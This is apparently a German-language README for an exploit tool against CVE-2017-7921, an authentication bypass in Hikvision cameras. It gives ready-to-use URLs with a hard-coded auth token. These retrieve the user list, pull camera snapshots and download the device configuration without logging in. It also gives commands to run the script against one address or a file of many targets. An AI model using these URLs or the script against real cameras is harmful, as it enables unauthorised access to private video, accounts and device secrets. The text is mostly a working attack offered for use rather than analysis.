
Hikvision-Kamera CVE-2017-7921-EXP
In Hikvision-Geräten wurde ein Problem mit unsachgemäßer Authentifizierung entdeckt.
Die Schwachstelle der unsachgemäßen Authentifizierung tritt auf, wenn eine Anwendung Benutzer nicht ausreichend oder korrekt authentifiziert.
Dies kann einem böswilligen Benutzer ermöglichen, seine Privilegien auf dem System zu erweitern und Zugriff auf vertrauliche Informationen zu erhalten.
https://seclists.org/fulldisclosure/2017/Sep/23
Details zur Schwachstelle:
----------------------
Eine Liste aller Benutzer und ihrer Rollen abrufen:
http://camera.ip/Security/users?auth=YWRtaW46MTEK
Ein Kamera-Snapshot ohne Authentifizierung abrufen:
http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK
Und das Schlimmste daran: Man kann die Kamera-Konfiguration herunterladen:
http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK
python3 -m pip install -r requirements.txt
python3 CVE_2017_7921_EXP.py -t xxx.xx.xx.xx run
python3 CVE_2017_7921_EXP.py -t ./targets.txt run
